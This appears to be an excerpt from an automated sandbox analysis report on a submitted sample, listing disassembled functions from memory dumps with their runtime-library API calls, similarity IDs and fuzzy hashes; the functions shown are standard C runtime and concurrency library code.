String ID: MOC$RCC$f)D
API String ID: 3472968176-2775210027
Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
Instruction ID: 5cae1513af662ba440638dd7ee49feb5f2792d2f588be08279d842db1cdb6bcc
Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
Instruction Fuzzy Hash: C9F031B4514258DFCB62BB68C5315ED7B66EF06740F458095F4009F212CB785E84CB59

Function 004065A2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004065AE

Part of subcall function 00405651: __getptd_noexit.LIBCMT ref: 00405654
Part of subcall function 00405651: __amsg_exit.LIBCMT ref: 00405661

__getptd.LIBCMT ref: 004065C5
__amsg_exit.LIBCMT ref: 004065D3
__lock.LIBCMT ref: 004065E3

Strings

p{E, xrefs: 004065F0

Memory Dump Source

Source File: 00000000.00000002.1380674376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1380650871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380674376.0000000000411000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380736482.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380863350.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1381027423.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: p{E
API String ID: 3521780317-1640866912
Opcode ID: ee2ecf4eaf9fe9d5b9c00c07fb96606b08fc391b7f5e4c7d789d10cd755c034e
Instruction ID: 77ba44c5f39e61b5d61e946e7435461fe91e00009da8772b85c65231eedb4d7d
Opcode Fuzzy Hash: ee2ecf4eaf9fe9d5b9c00c07fb96606b08fc391b7f5e4c7d789d10cd755c034e
Instruction Fuzzy Hash: 7AF06271940B00ABD620FB65980674A77A09B0072AF51453FA446B72D2CB7CE910CA5D

Function 006A13D4 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006A14DF
_free.LIBCMT ref: 006A14F6
_free.LIBCMT ref: 006A1515
_free.LIBCMT ref: 006A1530
_free.LIBCMT ref: 006A1547

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction ID: 038d2e607151ccc5d12bd02138f21f350833cdb15e4a5ecef75f4b541278bccb
Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction Fuzzy Hash: 59519E71A00204ABDB21FF69D841AAAB7F6EF5B720F14056DE80ADB250E735DE018F94

Function 006A1E6B Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006A1EDD
_free.LIBCMT ref: 006A1EFD

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
Instruction ID: e6e7624738525176586b8b111ac9c437b05cfd9d4acd02089274d4a968759d35
Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
Instruction Fuzzy Hash: CD41E472A003049FDB10EF78C981A9AB7E6EF8A714F154668E915EF391DB31ED01CB84

Function 0068B856 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0068B87B

Part of subcall function 006818B1: _SpinWait.LIBCONCRT ref: 006818C9

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0068B88F
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0068B8C1
List.LIBCMT ref: 0068B944
List.LIBCMT ref: 0068B953

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
Instruction ID: 4f874636f17263f3e8c5124908facd0f8ec06685215e2b0b91aff0967b6ad6d8
Opcode Fuzzy Hash: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
Instruction Fuzzy Hash: 283153B2D01616DFCF14FFA4D5916EDBBB6BF05304B18126ED8017B242DB316A05CB98

Function 006757F5 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 006757D2
std::_Locinfo::~_Locinfo.LIBCPMT ref: 006757E6

Part of subcall function 0067C4DD: __EH_prolog3_GS.LIBCMT ref: 0067C4E4

std::_Locinfo::_Locinfo.LIBCPMT ref: 0067584B
__Getcoll.LIBCPMT ref: 0067585A
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0067586A

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
String ID:
API String ID: 1844465188-0
Opcode ID: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
Instruction ID: 729ad44afd7f85fcadbaa1dc4c7ac583d03242c35a52355055803b05058602d0
Opcode Fuzzy Hash: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
Instruction Fuzzy Hash: 5E219A71810304EFEB90EFA4C441BDDBBB1BF44321F50C45EE48AAB282DBB49944CB59

Function 00406618 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00406636

Part of subcall function 00402A08: __mtinitlocknum.LIBCMT ref: 00402A1E
Part of subcall function 00402A08: __amsg_exit.LIBCMT ref: 00402A2A
Part of subcall function 00402A08: EnterCriticalSection.KERNEL32(0040271B,0040271B,?,004027EF,00000004,004556E0,0000000C,00406722,00401024,0040272A,00000000,00000000,00000000,?,00405603,00000001), ref: 00402A32

___sbh_find_block.LIBCMT ref: 00406641
___sbh_free_block.LIBCMT ref: 00406650
HeapFree.KERNEL32(00000000,00401024,00455870,0000000C,004029E9,00000000,00455700,0000000C,00402A23,00401024,0040271B,?,004027EF,00000004,004556E0,0000000C), ref: 00406680
GetLastError.KERNEL32(?,004027EF,00000004,004556E0,0000000C,00406722,00401024,0040272A,00000000,00000000,00000000,?,00405603,00000001,00000214), ref: 00406691

Memory Dump Source

Source File: 00000000.00000002.1380674376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1380650871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380674376.0000000000411000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380736482.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380863350.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1381027423.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: c32f2d93153d525265805073891dfea4bc32b5a90e8604a9fe79643833a75083
Instruction ID: 458f0a810f139032dd3d27daa44e4cf69e972516ec7d6b2a93ae1fdaa2c88640
Opcode Fuzzy Hash: c32f2d93153d525265805073891dfea4bc32b5a90e8604a9fe79643833a75083
Instruction Fuzzy Hash: 7E018F31901301AADF206F72AC0AB6E3A649F0076AF61483FF001B61D1DE7ED9608E5C

Function 006882B0 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 006882DA

Part of subcall function 00691943: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0069196A
Part of subcall function 00691943: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00691983
Part of subcall function 00691943: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 006919F9
Part of subcall function 00691943: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00691A01

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 006882E8
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 006882F2
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 006882FC
__CxxThrowException@8.LIBVCRUNTIME ref: 0068831A

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowVirtualWork
String ID:
API String ID: 2080793376-0
Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
Instruction ID: 973a0bd57f1dc15c6fa266a5c3077be66fe0e1eb9b91d93ef4a7c8ad5f34b774
Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
Instruction Fuzzy Hash: 1AF0F631A006286FCA65B775981296DBB2B9F91B50B40032EF80193252DF659F0587CE

Function 006AA7D5 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006AA7ED
_free.LIBCMT ref: 006AA7FF
_free.LIBCMT ref: 006AA811
_free.LIBCMT ref: 006AA823
_free.LIBCMT ref: 006AA835

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: e63eb0b6135dfbee4458b5294a92b2aa5fce0b2b4b383dc4dbd57c7e2fb36d9a
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 97F01972405210EBC664FB98E4C7C5A73EAEE02710B64095AF049DB711CB35FD81CE6A

Function 006A20BA Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006A20D8
_free.LIBCMT ref: 006A20EA
_free.LIBCMT ref: 006A20FD
_free.LIBCMT ref: 006A210E
_free.LIBCMT ref: 006A211F

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: d7a3516d107b2aba74e5406a88ab8d0637adddf1b6d9ea38cd6e8ad1fdf008fb
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: BDF01D70C00321DBCA61BB18AC824043B62EF1A722700026AF4079B372CA35DD92DF8E

Function 0044EEC4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0044E32F), ref: 0044EEC9
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0044EED9

Strings

IsProcessorFeaturePresent, xrefs: 0044EED3
KERNEL32, xrefs: 0044EEC4

Memory Dump Source

Source File: 00000000.00000002.1380674376.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1380650871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380674376.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380736482.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380863350.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1381027423.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: cb5cd58b166a94e031ecc96f325e2d68494dda8542b672f0489249257011d617
Instruction ID: b186f103d3e60b1b43d9e4a2aec5f149aef0083cedda4d78c4f99bdf2dc14c27
Opcode Fuzzy Hash: cb5cd58b166a94e031ecc96f325e2d68494dda8542b672f0489249257011d617
Instruction Fuzzy Hash: 80F03031A40A09D2EB005BA6BD1A77F7B78FB81747FA60491E5D6B00C5DF34D0B5C25A

Function 00406564 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

___addlocaleref.LIBCMT ref: 00406576

Part of subcall function 0040643C: InterlockedIncrement.KERNEL32(00401024), ref: 0040644E
Part of subcall function 0040643C: InterlockedIncrement.KERNEL32(00002428), ref: 0040645B
Part of subcall function 0040643C: InterlockedIncrement.KERNEL32(3B08758B), ref: 00406468
Part of subcall function 0040643C: InterlockedIncrement.KERNEL32(00E46583), ref: 00406475
Part of subcall function 0040643C: InterlockedIncrement.KERNEL32(6A227700), ref: 00406482
Part of subcall function 0040643C: InterlockedIncrement.KERNEL32(6A227700), ref: 0040649E
Part of subcall function 0040643C: InterlockedIncrement.KERNEL32(458D0CEB), ref: 004064AE
Part of subcall function 0040643C: InterlockedIncrement.KERNEL32(4589584C), ref: 004064C4

___removelocaleref.LIBCMT ref: 00406581

Part of subcall function 004064CB: InterlockedDecrement.KERNEL32(?), ref: 004064E5
Part of subcall function 004064CB: InterlockedDecrement.KERNEL32(?), ref: 004064F2
Part of subcall function 004064CB: InterlockedDecrement.KERNEL32(?), ref: 004064FF
Part of subcall function 004064CB: InterlockedDecrement.KERNEL32(?), ref: 0040650C
Part of subcall function 004064CB: InterlockedDecrement.KERNEL32(?), ref: 00406519
Part of subcall function 004064CB: InterlockedDecrement.KERNEL32(?), ref: 00406535
Part of subcall function 004064CB: InterlockedDecrement.KERNEL32(00000000), ref: 00406545
Part of subcall function 004064CB: InterlockedDecrement.KERNEL32(?), ref: 0040655B

___freetlocinfo.LIBCMT ref: 00406595

Part of subcall function 004062F3: ___free_lconv_mon.LIBCMT ref: 00406339
Part of subcall function 004062F3: ___free_lconv_num.LIBCMT ref: 0040635A
Part of subcall function 004062F3: ___free_lc_time.LIBCMT ref: 004063DF

Strings

p{E, xrefs: 0040658C

Memory Dump Source

Source File: 00000000.00000002.1380674376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1380650871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380674376.0000000000411000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380736482.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380863350.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1381027423.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
String ID: p{E
API String ID: 467427115-1640866912
Opcode ID: 936e0e4dbc979ac1a488d5c82fd0083aacd8c9d94a79b4165a1465e678760a32
Instruction ID: e78b99c9bff483c4c4aefd305eb7dbfcd038d9bd417659ca1e2ab362352d3607
Opcode Fuzzy Hash: 936e0e4dbc979ac1a488d5c82fd0083aacd8c9d94a79b4165a1465e678760a32
Instruction Fuzzy Hash: 59E04F22901A2125DA312F1D7C1026BA2945F8A725B1B057FF81AF73DCDB3C6DA080FD

Function 006A6228 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 006A62B3
__alldvrm.LIBCMT ref: 006A64B4
__alldvrm.LIBCMT ref: 006A64D6

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction ID: 9a68963441eba978ee1641d259381f3dc446161836d42d65cee865eaaa18fdc4
Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction Fuzzy Hash: C0A115719002869FEB21EE28C8917EEBBE6EF57350F1C81ADF5959B381C6348D42CB50

Function 006A38B9 Relevance: 6.3, APIs: 4, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction ID: e37de2f41a00622aaab87bf80b7cc6bfdcb1cf9a23a7cc85395b31adea65cffd
Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction Fuzzy Hash: E4C1D074D04269AFCF11AFA8D841BEEBBB6AF1A310F044199F415AB392D7309E41CF65

Function 00672A90 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00672C15

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
Instruction ID: b174d19e847b18b8ea7a79818fd1aec165553f465ab9aa2f53e92016304cb792
Opcode Fuzzy Hash: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
Instruction Fuzzy Hash: A871FD72900218AFDB62DF64DD85FAEB7BCEF09711F0041A9B509E6155DA70AF80CF54

Function 0040796F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004079A3
__isleadbyte_l.LIBCMT ref: 004079D7
MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000000,?,?,00000000), ref: 00407A08
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000000,?,?,00000000), ref: 00407A76

Memory Dump Source

Source File: 00000000.00000002.1380674376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1380650871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380674376.0000000000411000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380736482.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380863350.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1381027423.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: ada4847291b55b5889b160a6f3bebf22b3115bbd0739d03958e536e9936e0593
Instruction ID: 707ad37509f0008249e6022ee2686cef4ee82e5a7b7410487296847ea80482f0
Opcode Fuzzy Hash: ada4847291b55b5889b160a6f3bebf22b3115bbd0739d03958e536e9936e0593
Instruction Fuzzy Hash: 2931E671E18245EFEB10DF64C8449AF3BA5BF40310F14857AE461AB2D2D734ED40DB56

Function 0067DD81 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0067DDD9
__Xtime_diff_to_millis2.LIBCPMT ref: 0067DDF3
_xtime_get.LIBCPMT ref: 0067DE16
__Xtime_diff_to_millis2.LIBCPMT ref: 0067DE22

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction ID: 741579768c30703329dcf1c258904df56370166f1466f1ca5ef1fc39ca2d3a1d
Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction Fuzzy Hash: 99215E75E002199FDF01EFA4DD829FEBBBAEF09710F104069F905A7261D7B09E018BA4

Function 0069976A Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00699786
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0069979F

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
Instruction ID: 9f82ce8c05cf1f8184d4d13abab0cff0947a2d6311fda23a34ea75c3c9cbd7ec
Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
Instruction Fuzzy Hash: 2201D8321297116EAF641BF87CCA5A6279EFB05775B30033EF11099BE2EF118C11966D

Function 00699A59 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00699A73

Part of subcall function 006999C0: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 006999EF
Part of subcall function 006999C0: ___AdjustPointer.LIBCMT ref: 00699A0A

_UnwindNestedFrames.LIBCMT ref: 00699A88
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00699A99
CallCatchBlock.LIBVCRUNTIME ref: 00699AC1

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: c3561b76038abfa95439ed1a020643973a8d281205c722f74fd2776002490086
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 1C011732100148BBCF129E95CC41EEB3BAEEF88754F044018FE0896621C332E861DBA4

Function 006932AB Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 006932DA
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 006932F8

Part of subcall function 00688DB0: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 00688DD1
Part of subcall function 00688DB0: Hash.LIBCMT ref: 00688E11

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00693301
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00693321

Part of subcall function 0068FE08: Hash.LIBCMT ref: 0068FE1A

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction ID: 8c6b94b40b28477ded311a396886d2d5afd69062febe68809b9fa16d0a9b350f
Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction Fuzzy Hash: BA117C76400204AFCB15EFA4C8819CAF7B9BF19320B408A1EE55687692DB70AA14CBA0

Function 00696ABE Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00696AD8
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00696AEC
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00696B04
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00696B1C

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: 90913c86384e67bea165985208b2b338ce510be176bf1a2581f31d4ce29905c6
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 0301AD32600215BBCF16BE55C851AEF7BAFAF94350F00011AFC16EB682EA71ED1196A4

Function 0044EDB0 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0044EDD6

Part of subcall function 0044EBFB: __fltout2.LIBCMT ref: 0044EC27

__cftog_l.LIBCMT ref: 0044EDFC
__cftoe_l.LIBCMT ref: 0044EE2E

Memory Dump Source

Source File: 00000000.00000002.1380674376.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1380650871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380674376.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380736482.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380863350.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1381027423.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

